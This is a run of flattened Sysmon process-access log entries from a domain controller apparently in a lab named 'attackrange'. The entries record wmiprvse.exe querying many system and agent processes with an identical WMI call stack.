15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 